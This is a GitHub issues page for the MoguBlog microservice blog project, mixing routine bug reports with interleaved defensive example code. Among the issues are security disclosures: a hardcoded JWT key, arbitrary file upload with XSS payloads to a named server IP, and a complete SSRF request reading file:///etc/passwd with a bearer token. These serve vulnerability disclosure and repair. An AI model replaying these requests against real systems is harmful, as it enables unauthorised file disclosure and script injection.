moxi624 / mogu_blog_v2

MoguBlog (蘑菇博客) is a blog system built on a microservice architecture with separated frontend and backend. The web client uses Vue + Element, and the mobile client uses uniapp and ColorUI. The backend is developed with Spring Cloud + Spring Boot + mybatis-plus, uses JWT + Spring Security for login authentication and permission checks, uses ElasticSearch and Solr as full-text search services, uses GitHub Actions for continuous integration of the blog, uses ELK to collect blog logs, supports uploading files to Qiniu Cloud and MinIO, and supports one-click deployment with a Docker Compose script.

Home Page: http://www.moguit.cn/#/

License: Apache License 2.0

Java 33.94% JavaScript 21.58% HTML 1.09% Vue 28.05% CSS 14.57% FreeMarker 0.30% Stylus 0.03% SCSS 0.32% Dockerfile 0.04% Shell 0.09%
blog java vue element-ui spring-boot springcloud mybatis


mogu_blog_v2's Issues

Nacos cannot connect to MySQL because of a timezone problem.

Operating system: CentOS 7.6 64bit
Nacos error message:
Caused by: com.alibaba.nacos.api.exception.NacosException: Nacos Server did not start because dumpservice bean construction failure : No DataSource set at com.alibaba.nacos.config.server.service.dump.DumpService.dumpOperate(DumpService.java:203) at com.alibaba.nacos.config.server.service.dump.ExternalDumpService.init(ExternalDumpService.java:50) at sun.reflect.NativeMethodAccessorImpl.invoke0(Native Method) at sun.reflect.NativeMethodAccessorImpl.invoke(NativeMethodAccessorImpl.java:62) at sun.reflect.DelegatingMethodAccessorImpl.invoke(DelegatingMethodAccessorImpl.java:43) at java.lang.reflect.Method.invoke(Method.java:498) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleElement.invoke(InitDestroyAnnotationBeanPostProcessor.java:363) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor$LifecycleMetadata.invokeInitMethods(InitDestroyAnnotationBeanPostProcessor.java:307) at org.springframework.beans.factory.annotation.InitDestroyAnnotationBeanPostProcessor.postProcessBeforeInitialization(InitDestroyAnnotationBeanPostProcessor.java:136) ... 40 common frames omitted Caused by: java.lang.IllegalStateException: No DataSource set at org.springframework.util.Assert.state(Assert.java:73) at org.springframework.jdbc.support.JdbcAccessor.obtainDataSource(JdbcAccessor.java:77) at org.springframework.jdbc.core.JdbcTemplate.execute(JdbcTemplate.java:371) at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:452) at org.springframework.jdbc.core.JdbcTemplate.query(JdbcTemplate.java:462) at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:473) at org.springframework.jdbc.core.JdbcTemplate.queryForObject(JdbcTemplate.java:480) at com.alibaba.nacos.config.server.service.repository.extrnal.ExternalStoragePersistServiceImpl.findConfigMaxId(ExternalStoragePersistServiceImpl.java:553)

Using a hardcoded cryptographic key when creating and verifying JSON Web Tokens.

Hi, we are a research group that helps developers build secure applications. We designed a cryptographic misuse detector for the Java language (our main concern is the secure implementation and use of JSON Web Tokens). We found your great public repository (i.e., mogu_blog_v2) on GitHub, and several security issues detected by our detector are shown in the following. The specific security issues we found are as follows:
(1) Location: Package: com.moxi.mogublog.utils; Class: JwtUtil.class
Security issue: Using a predictable/constant seed to generate the cryptographic key when creating and verifying JSON Web Tokens.

Using a hard-coded seed to generate the key [(new SecretKeySpec(encodedKey, 0, encodedKey.length, "AES");] does not conform to the security implementation specification of JWT, which may bring security risks to your system. It is recommended that you use a more secure way to generate the key used to generate the JWT. (For the hazards of hardcoded keys, you can refer to CWE-321 and NIST Special Publication 800-57.)

We wish the above security issues could truly help you build a secure application. If you have any concerns or suggestions, please feel free to contact us; we are looking forward to your reply. Thanks.
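An added example (not the project's JwtUtil) of the alternative the report recommends: an HS256 signer/verifier whose key is read at startup from configuration instead of a constant in source, enforcing the 256-bit minimum that RFC 7518 sets for HS256. Python is used for illustration; the environment variable name JWT_HS256_KEY_B64 is an assumption of this example.

```python
import base64
import hashlib
import hmac
import json
import os
import secrets
import time
from typing import Optional

MIN_KEY_BYTES = 32  # RFC 7518 section 3.2: HS256 keys must be at least 256 bits

def _b64url(data: bytes) -> str:
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode("ascii")

def _b64url_decode(text: str) -> bytes:
    return base64.urlsafe_b64decode(text + "=" * (-len(text) % 4))

def generate_key_b64() -> str:
    # One-off CSPRNG key for the deployment's secret store, never for source code.
    return _b64url(secrets.token_bytes(MIN_KEY_BYTES))

def load_key(raw: Optional[str] = None, env_var: str = "JWT_HS256_KEY_B64") -> bytes:
    # Key comes from configuration (hypothetical env var) and must meet the minimum length.
    raw = os.environ.get(env_var) if raw is None else raw
    if raw is None:
        raise RuntimeError(f"{env_var} is not set; refusing to start")
    key = _b64url_decode(raw)
    if len(key) < MIN_KEY_BYTES:
        raise RuntimeError(f"JWT key is {len(key)} bytes, need >= {MIN_KEY_BYTES}")
    return key

def sign(claims: dict, key: bytes) -> str:
    header = _b64url(json.dumps({"alg": "HS256", "typ": "JWT"}, separators=(",", ":")).encode())
    payload = _b64url(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(key, f"{header}.{payload}".encode("ascii"), hashlib.sha256).digest()
    return f"{header}.{payload}.{_b64url(sig)}"

def verify(token: str, key: bytes, now: Optional[float] = None) -> Optional[dict]:
    """Return the claims if alg, signature and exp all check out, else None."""
    parts = token.split(".")
    if len(parts) != 3:
        return None
    header_b64, payload_b64, sig_b64 = parts
    if json.loads(_b64url_decode(header_b64)).get("alg") != "HS256":  # pin the algorithm server side
        return None
    expected = hmac.new(key, f"{header_b64}.{payload_b64}".encode("ascii"), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, _b64url_decode(sig_b64)):  # constant-time compare
        return None
    claims = json.loads(_b64url_decode(payload_b64))
    if "exp" in claims and (time.time() if now is None else now) >= claims["exp"]:
        return None
    return claims
```

Rotating the key then means changing the configured value and restarting, not shipping a new build, which is the property a constant in JwtUtil cannot give you.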

Mogu blog has a vulnerability that allows uploading arbitrary files

Use mogu2021:mogu2021 to log in to the Mogu blog.
http://demoweb.moguit.cn/
Choose User Center > User Avatar > Image.
At this point, use Burp Suite to capture the request packet.
Use the Repeater module in Burp Suite.
Try to change the file contents in the request packet to the XSS payload and try to change the file name to an HTML suffix.
You can see the successful upload and the file path in the response packet.
Open your browser to access the HTML file you just uploaded.

The sidebar table of contents on the blog detail page is blank

Steps to reproduce: backend mogu_blog_go + frontend vue_mogu_web under mogu_blog_v2
I found a fix record for the blank table of contents, but when I run the mogo_go version the table of contents is still blank.

mogu_blog_v2 FileRestApi#uploadPicsByUrl has an SSRF vulnerability

1. Reproduction details

Construct a Burp Suite request, use the file protocol to read the contents of /etc/passwd, and write them into an image:

POST /mogu-picture/file/uploadPicsByUrl HTTP/1.1
Host: you-ip:8602
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/111.0
Accept: application/json, text/plain, */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Authorization: bearer_eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJhZG1pblVpZCI6IjFmMDFjZDFkMmY0NzQ3NDNiMjQxZDc0MDA4YjEyMzMzIiwicm9sZSI6Im51bGzotoXnuqfnrqHnkIYiLCJjcmVhdGVUaW1lIjoxNjgwMTU2NjY4NTExLCJzdWIiOiJhZG1pbiIsImlzcyI6Im1vZ3VibG9nIiwiYXVkIjoiMDk4ZjZiY2Q0NjIxZDM3M2NhZGU0ZTgzMjYyN2I0ZjYiLCJleHAiOjE2ODAxNjAyNjgsIm5iZiI6MTY4MDE1NjY2OH0.oXuQcn6Do52V7XkiPiH1Ug1XKOHNgKk4BTeksFgj8DI
Connection: close
Content-Type: application/json
Content-Length: 122

{
	"token":"asdf",
        "adminUid":"asdf",
        "sortName":"admin",
        "projectName":"blog",
        "urlList":[
                "file:///etc/passwd"]
}

Visit the image address: http://your-ip:8600/blog/admin/jpg/2023/3/30/1680160261977.jpg

2. Underlying analysis

Entry point:
FileRestApi#uploadPicsByUrl

Enter the uploadPictureByUrl() method:
The incoming fileV0 is the request parameter automatically bound by Spring Boot from the frontend; urlList is taken out of fileV0.

Iterate over urlList and pass each entry into the uploadPictureByUrl() method, without any filtering in between:

Go further into the uploadPictureByUrl method:
No filtering is done in the uploadPictureByUrl method either; the URL is passed directly into the URL class.

After calling the openConnection method, the data stream is read and written to the output stream:

The path the file is written to (file output stream):

3. Fix proposal

(1) It is suggested to use the HttpURLConnection class instead of the URL class, check the IP address of the request, and filter out intranet IPs.
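The check the fix proposal asks for, as an added example that is not the project's code: scheme allowlisting plus resolved-address filtering for a fetch-by-URL path such as uploadPicsByUrl. Python is used for illustration; the `resolver` parameter is an assumption of this example so the logic can be tested without DNS, and the address classification comes from the standard `ipaddress` module.

```python
import ipaddress
import socket
from typing import Callable, Iterable
from urllib.parse import urlsplit

ALLOWED_SCHEMES = {"http", "https"}  # file:, ftp:, gopher:, jar: and friends never reach the fetcher

def resolve_all(host: str) -> Iterable[str]:
    """Every address the name maps to (v4 and v6); a literal IP resolves to itself."""
    return {info[4][0] for info in socket.getaddrinfo(host, None)}

def is_public_address(addr: str) -> bool:
    ip = ipaddress.ip_address(addr)
    # Unwrap ::ffff:a.b.c.d so an internal IPv4 range cannot hide in IPv6 syntax.
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped is not None:
        ip = ip.ipv4_mapped
    # is_global already excludes loopback, RFC 1918, link-local, CGNAT, ULA and reserved space.
    return ip.is_global and not ip.is_multicast

def validate_fetch_url(url: str, resolver: Callable[[str], Iterable[str]] = resolve_all) -> str:
    """Return url if it may be fetched; raise ValueError naming the first failed check."""
    parts = urlsplit(url)
    if parts.scheme.lower() not in ALLOWED_SCHEMES:
        raise ValueError(f"scheme not allowed: {parts.scheme!r}")
    if not parts.hostname:
        raise ValueError("missing host")
    if parts.username is not None or parts.password is not None:
        raise ValueError("userinfo in URL not allowed")
    try:
        addrs = list(resolver(parts.hostname))
    except (socket.gaierror, ValueError) as exc:
        raise ValueError(f"cannot resolve {parts.hostname!r}: {exc}") from exc
    if not addrs:
        raise ValueError(f"no address for {parts.hostname!r}")
    # Every returned address must be public; a single internal record is enough to refuse.
    for addr in addrs:
        if not is_public_address(addr):
            raise ValueError(f"{parts.hostname!r} resolves to non-public address {addr}")
    return url

def is_safe_fetch_url(url: str, resolver: Callable[[str], Iterable[str]] = resolve_all) -> bool:
    try:
        validate_fetch_url(url, resolver)
        return True
    except ValueError:
        return False
```

A pre-fetch check alone is not enough: the fetcher must also connect to the address that was validated (DNS can change between check and connect) and must not follow redirects blindly, so with HttpURLConnection disable automatic redirects and re-run the check on every hop.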

Submitting a blog edited with Markdown in the admin backend produces extra escape characters

Problem reproduction

For example, I want the letters in the red box to be expressed as a formula, so I copy them into $ $

Then for some non-letter symbols an escape character \ appears automatically

After submitting and uploading, it also does not display correctly:

Mogu Blog's markdown editor is powered by Vditor, so I looked at and tried Vditor's online demo and found that the same problem exists there:

How to solve the problem

Personally I think it is most likely a Vditor problem, possibly caused by Vditor's special handling of escape characters. Next I will try some markdown editors to see whether this can be solved.

nacos branch: the frontend cannot use ES search

Hello, after deploying the blog environment on the nacos branch with docker compose, the frontend cannot display search results correctly when using the ES search feature:

From docker ps and the nacos console I can tell that the mogu_search container has started normally.

In the backend --> System Configuration it is set to ES and saved:

mogu_blog_v5.2 backend Management System has a vulnerability of uploading arbitrary files

1. Black box pentesting

Use mogu2021:mogu2021 to log in to the mogu_blog_v5.2 backend Management System.

Find the Blog Management - Blog Management - Local-file Upload feature.

Click the blue button to select a local image for uploading, and then click the green button to send the image to the server side.

At this point, use Burp Suite to capture the request packet,

and then forward it to the Repeater module.

Try to send a request to upload a normal image, and you can see that the image was uploaded successfully.

The response packet returns the address information of the image.

Splice the address in the response packet onto the URL to try to access the image we just uploaded.

The whole URL:
http://23.224.61.136:8600//blog/admin/png/2022/3/8/1646708813850.png

You can see that the uploaded image is accessed successfully.

Back in Burp Suite, try changing the contents of the file in the request packet to an XSS payload, as well as trying to change the file name to an HTML suffix.

You can see the successful upload and the file path in the response packet.

Splice the file path onto the URL and open a new browser (without admin cookies/session/token) to try to access it.

The whole URL:
http://23.224.61.136:8600///blog/admin/html/2022/3/8/1646709195222.html

You can see that the XSS payload was successfully executed and that there is an arbitrary file upload.

Trying again to modify the request packet, we found that arbitrary file uploads were possible, while the feature was intended to allow only image-format files to be uploaded.

jsp:

php:

cpp:

2. White box pentest

Based on the URL of the image upload request (/mogu-picture/file/pictures), we can tell that the class that handles the image upload function is located in the /mogu-picture subproject.

According to the request URL (mogu-picture/file/pictures), continue to locate the FileRestApi.java class:

mogu_blog/mogu_blog_v2/mogu_picture/src/main/java/com/moxi/mogublog/picture/restapi/FileRestApi.java

With @RequestMapping("/file") you can see that all requests for the /file path will be processed by this class,

and requests for the /file/pictures path are handled by the uploadPics() method of this class.

This method first obtains the system configuration file, and this step does not perform any checks on the suffix, format, or content of the uploaded file.

This method then calls the batchUploadFile() method of the FileServiceImpl class instance object.

Follow up into the batchUploadFile() method of the FileServiceImpl class to see its source code.

The first part of the code gets some file and system base information, none of which is file-checked.

Continuing to follow the code for file uploads,

you can see that there is no strict verification of the uploaded file extension, file content, or file format.

The code execution then reaches the try/catch {} block, which involves the uploadFile() method of the QiniuServiceImpl class.

Going deeper into this method leads to the uploadSingleFile() method.

You can see that the file suffix, file format and file content are still not strictly verified.

Back in the batchUploadFile() method of the FileServiceImpl class,

after checking the subsequent code, not only did the code for uploading to the Qiniu server lack strict file verification, but the code for uploading to the Minio server and the code for uploading to the local server were not strictly verified either.

Finally, in the batchUploadFile() method of the FileServiceImpl class, the following code will be executed.

It sets the information of the uploaded file into some settings.

Then it saves and returns the upload result to the client in the response.

The entire code execution process does not strictly check the suffix name, file format, and file content of the uploaded files.

This allows attackers to use the file upload interface to upload arbitrary files and even insert XSS payloads.
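The validation gate that both upload reports (this one and the avatar report above) describe as missing, as an added example rather than the project's FileServiceImpl code: the client-declared extension must be on an image allowlist, the file's leading bytes must match that exact type, and the stored name is generated server side. Python is used for illustration; the 5 MB cap and the signature table are assumptions of this example, and the sample inputs in the test are constructed.

```python
import secrets
from typing import Optional, Tuple

# Allowed extension -> byte signatures (magic numbers) the file must start with.
IMAGE_SIGNATURES = {
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
    "gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 5 * 1024 * 1024  # size cap; an assumed policy value, not the project's

def sniff_image_type(data: bytes) -> Optional[str]:
    """Return the canonical image type the leading bytes claim, or None."""
    for ext, sigs in IMAGE_SIGNATURES.items():
        if data.startswith(sigs):
            return "jpg" if ext == "jpeg" else ext
    return None

def validate_upload(filename: str, data: bytes) -> Tuple[bool, str]:
    """Return (accepted, stored_name_or_reason). Only the trailing extension is read from the client name."""
    if not data or len(data) > MAX_BYTES:
        return False, "empty or oversized"
    base = filename.replace("\\", "/").rsplit("/", 1)[-1]  # drop any client-supplied path
    if "." not in base:
        return False, "no extension"
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in IMAGE_SIGNATURES:
        return False, f"extension not allowed: .{ext}"  # .html, .jsp, .php, .cpp all stop here
    canonical = "jpg" if ext == "jpeg" else ext
    if sniff_image_type(data) != canonical:
        # Catches an HTML or script body uploaded under an image name.
        return False, f"content does not match .{ext}"
    # Server-chosen name: random token plus the verified extension; nothing from the client.
    return True, f"{secrets.token_hex(16)}.{canonical}"
```

A polyglot file that carries a valid image header with markup inside still passes a magic-byte check, so the origin that serves /blog/admin/... should also send X-Content-Type-Options: nosniff with a fixed image Content-Type, and ideally live on a separate origin from the admin console so nothing that slips through runs with admin cookies.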

This is probably a typo

package com.moxi.mogublog.admin.restapi;

In this package, the updateEmail() method that updates the administrator's email or phone number:

// the parameter passed here is the admin's new email or new phone number; it should be the verification code, which is also what you compare below
String checkValidCode = stringRedisTemplate.opsForValue().get(newInfo);
if (checkValidCode.isEmpty()) {
    return ResultUtil.result(SysConf.ERROR, "验证码已过期");
}
if (!checkValidCode.equals(validCode)) {
    return ResultUtil.result(SysConf.ERROR, "验证码不正确");
}
